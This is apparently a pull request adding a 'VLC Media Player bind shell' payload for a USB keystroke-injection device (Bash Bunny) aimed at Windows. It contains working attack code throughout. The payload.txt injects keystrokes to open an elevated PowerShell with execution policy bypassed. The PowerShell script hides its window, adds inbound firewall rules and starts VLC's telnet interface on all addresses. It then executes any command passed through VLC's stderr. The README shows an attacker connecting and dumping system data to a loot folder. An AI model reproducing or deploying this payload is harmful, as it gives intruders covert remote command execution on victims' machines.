### PR TITLE
"VideoLan VLC Media Player" Bind Shell

### DIFF
--- a/payloads/library/remote_access/videolan-vlc_bind-shell/README.md
+++ b/payloads/library/remote_access/videolan-vlc_bind-shell/README.md
@@ -1,0 +1,51 @@
+# "VideoLan VLC Media Player" Bind Shell
+
+- Title:         "VideoLan VLC Media Player" Bind Shell
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows
+- Category:      Remote Access
+
+## Concept
+
+In the list of commands allowed by "VideoLan VLC Media Player" on the "Telnet" interface, the use of the command "add" with a wrong argument redirects to the "stderr" of the process the exact content of this argument. The PowerShell script listens to the "stderr" output of the "VideoLan VLC Media Player" process and retrieves the payload to execute it.
+
+## Description
+
+1) Hide "PowerShell" window.
+2) Determines the path of the "VLC Media Player" executable.
+3) Creates two rules on the native firewall of "Microsoft Windows" to :
+- Allow the executable to open a TCP port.
+- Allow all incoming connections on that TCP port.
+4) Starts the "VLC Media Player" executable with the "Telnet" interface enabled.
+5) Redirects the standard error output of this process and retrieves the payload for execution.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly TELNET_PORT="44423"
+readonly TELNET_PASSWORD="VLC_T3LN3T"
+
+```
+
+## Exploitation
+
+```
+hacker@hacker-computer:~$ nmap -Pn -sT -p 44423 <TARGET-IP>
+[...]
+hacker@hacker-computer:~$ telnet <TARGET-IP> 44423
+Trying <TARGET-IP>...
+Connected to <TARGET-IP>.
+Escape character is '^]'.
+VLC media player 3.0.18 Vetinari
+Password: <TELNET_PASSWORD>
+Welcome, Master
+> add "EXEC/(ls C:\Users\) > .\..\..\loot\ls.log"
+> add "EXEC/(ipconfig) > .\..\..\loot\ipconfig.log"
+> shutdown
+```

--- a/payloads/library/remote_access/videolan-vlc_bind-shell/payload.ps1
+++ b/payloads/library/remote_access/videolan-vlc_bind-shell/payload.ps1
@@ -1,0 +1,86 @@
+<#
+# Author:       TW-D
+# Version:      1.0
+#>
+
+Param (
+    [String] $TELNET_PORT,
+    [String] $TELNET_PASSWORD
+)
+
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+# Determines the path of the "VLC Media Player" executable.
+#
+$VIDEOLAN_64 = "$(Join-Path -Path "${ENV:ProgramFiles}" -ChildPath "VideoLAN\VLC\vlc.exe")"
+$VIDEOLAN_32 = "$(Join-Path -Path "${ENV:ProgramFiles(x86)}" -ChildPath "VideoLAN\VLC\vlc.exe")"
+$VIDEOLAN_UNKNOW = "$(Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\" -Name "InstallLocation" -ErrorAction SilentlyContinue)\vlc.exe"
+
+$VIDEOLAN_PATH = ""
+Switch ($True) {
+    (Test-Path -Path "${VIDEOLAN_64}") {$VIDEOLAN_PATH = "${VIDEOLAN_64}"}
+    (Test-Path -Path "${VIDEOLAN_32}") {$VIDEOLAN_PATH = "${VIDEOLAN_32}"}
+    (Test-Path -Path "${VIDEOLAN_UNKNOW}") {$VIDEOLAN_PATH = "${VIDEOLAN_UNKNOW}"}
+}
+
+If ($TELNET_PORT -And $TELNET_PASSWORD -And $VIDEOLAN_PATH) {
+
+    # Creates two rules on the native firewall of "Microsoft Windows" to :
+    # - Allow the executable to open a TCP port.
+    # - Allow all incoming connections on that TCP port.
+    #
+    (NETSH ADVFIREWALL FIREWALL ADD RULE NAME="VideoLAN VLC Media Player Stream Port" PROTOCOL=TCP LOCALPORT=$TELNET_PORT DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN) | Out-Null
+    (NETSH ADVFIREWALL FIREWALL ADD RULE NAME="VideoLAN VLC Media Player Stream Service" ENABLE=YES PROGRAM="${VIDEOLAN_PATH}" DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN) | Out-Null
+        
+    Do {
+
+        # Starts the "VLC Media Player" executable with the "Telnet" interface enabled.
+        #
+        $ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
+        $ProcessInfo.FileName = "${VIDEOLAN_PATH}"
+        $ProcessInfo.Arguments = "--qt-notification 0 --qt-start-minimized --intf telnet --telnet-host 0.0.0.0 --telnet-port ${TELNET_PORT} --telnet-password ${TELNET_PASSWORD}"
+        $ProcessInfo.CreateNoWindow = $True
+        $ProcessInfo.UseShellExecute = $False
+        $ProcessInfo.RedirectStandardOutput = $False
+        $ProcessInfo.RedirectStandardError = $True
+
+        $Process = New-Object System.Diagnostics.Process
+        $Process.StartInfo = $ProcessInfo
+
+        # Redirects the standard error output of this process and retrieves the payload for execution.
+        #
+        Register-ObjectEvent -InputObject $Process -EventName "ErrorDataReceived" -SourceIdentifier "Process.Stderr" -Action {
+            $Data = $EventArgs.Data
+            ("${Data}" -Match '\%22(?<Action>.+)%2F(?<Argument>.+)\%22')
+            $Action = $Matches.Action
+            $Argument = [URI]::UnescapeDataString($Matches.Argument)
+            If ($Action -And $Argument) {
+                Try {
+                    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoLogo -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command ${Argument}" -NoNewWindow
+                } Catch {}
+            }
+            Clear-Variable -Name "Matches"
+        } | Out-Null
+
+        Register-ObjectEvent -InputObject $Process -EventName "Exited" -SourceIdentifier "Process.Exited" -Action {
+            Write-Host "Process.Exited !"
+        } | Out-Null
+
+        Try {
+            $Process.Start() | Out-Null
+            $Process.BeginErrorReadLine()
+            $Process.WaitForExit()
+        } Finally {
+            Unregister-Event -SourceIdentifier "Process.Stderr"
+            Unregister-Event -SourceIdentifier "Process.Exited"
+        }
+        
+    } While ($True)
+
+}

--- a/payloads/library/remote_access/videolan-vlc_bind-shell/payload.txt
+++ b/payloads/library/remote_access/videolan-vlc_bind-shell/payload.txt
@@ -1,0 +1,89 @@
+#!/bin/bash
+#
+# Title:            "VideoLan VLC Media Player" Bind Shell
+#
+# Description:
+#                   1) Hide "PowerShell" window.
+#                   2) Determines the path of the "VLC Media Player" executable.
+#                   3) Creates two rules on the native firewall of "Microsoft Windows" to :
+#                    - Allow the executable to open a TCP port.
+#                    - Allow all incoming connections on that TCP port.
+#                   4) Starts the "VLC Media Player" executable with the "Telnet" interface enabled.
+#                   5) Redirects the standard error output of this process and retrieves the payload for execution.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Remote Access
+# Target:           Microsoft Windows
+# Attackmodes:      HID STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 and VideoLan VLC Media Player 3.0.18
+#
+# NOTE
+# ===============
+# The target user must belong to the 'Administrator' group.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly TELNET_PORT="44423"
+readonly TELNET_PASSWORD="VLC_T3LN3T"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q GUI r
+Q DELAY 3000
+Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 1500
+Q CTRL-SHIFT ENTER
+Q DELAY 3000
+Q LEFTARROW
+Q DELAY 3000
+Q ENTER
+Q DELAY 3000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 2000
+
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -TELNET_PORT \"${TELNET_PORT}\" -TELNET_PASSWORD \"${TELNET_PASSWORD}\""
+Q ENTER
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+
+######## FINISH ########
+
+LED FINISH


### PR DESCRIPTION
1) Hide "PowerShell" window.
2) Determines the path of the "VLC Media Player" executable. 3) Creates two rules on the native firewall of "Microsoft Windows" to :
- Allow the executable to open a TCP port.
- Allow all incoming connections on that TCP port. 4) Starts the "VLC Media Player" executable with the "Telnet" interface enabled. 5) Redirects the standard error output of this process and retrieves the payload for execution.